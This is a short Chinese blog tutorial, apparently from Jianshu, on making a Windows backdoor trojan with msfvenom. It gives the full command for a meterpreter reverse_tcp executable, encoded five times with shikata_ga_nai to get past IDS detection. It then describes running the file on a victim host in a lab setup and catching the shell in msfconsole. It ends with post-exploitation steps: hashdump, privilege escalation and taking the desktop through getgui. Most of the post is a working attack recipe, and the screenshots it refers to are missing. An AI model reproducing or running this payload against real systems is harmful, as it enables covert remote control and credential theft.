【原创】通过MSFVenom生成exe后门木马拿shell

工具:msfconsole、msfvenom、Kali Linux

角色分配:攻击者:Kali Linux 2016.1,IP 192.168.1.106;

受害者:Windows Server 2003,IP 192.168.1.101。

思路:通过msfvenom制作exe后门木马,并用shikata_ga_nai编码绕过IDS检测,利用msfconsole连接msfvenom服务并拿shell。

过程:

1.执行以下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe

2.将test.exe复制到受害者主机上


3.在Kali中输入msfconsole,并按照下图进行配置:

4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈:

得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

友情链接更多精彩内容